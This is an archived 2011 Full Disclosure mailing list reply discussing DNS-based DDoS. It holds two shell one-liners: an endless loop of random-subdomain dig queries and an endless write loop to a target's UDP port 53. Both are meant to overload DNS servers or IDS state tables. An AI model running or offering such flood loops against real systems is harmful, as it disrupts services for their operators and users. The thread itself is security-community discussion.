|
Full Disclosure
mailing list archives
Re: New DDoS attack vector
From: Balder <balder.theglorious () googlemail com>
Date: Fri, 20 May 2011 16:08:05 +0200
On 20 May 2011 13:35, Kristian Erik Hermansen
<kristian.hermansen () gmail com> wrote:
On Fri, May 20, 2011 at 4:29 AM, Balder
<balder.theglorious () googlemail com> wrote:
* Why go to all this trouble when you could just do something like
the following (replacing dig with something faster)
- while true ; do dig $(</dev/urandom tr -dc A-Za-z0-9 | head -c
10 ).example.com MX ; done
dnsperf is what you really want ;)
even the following if if there is no IDS and if there is you would
probably have just as much chance of overloading its state table then
the dns server
while true ; do echo /dev/urandom > /dev/udp/target_IP_address/53 ; done
thanks to /dev/random
http://blog.rootshell.be/2011/05/05/binbash-phone-home/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
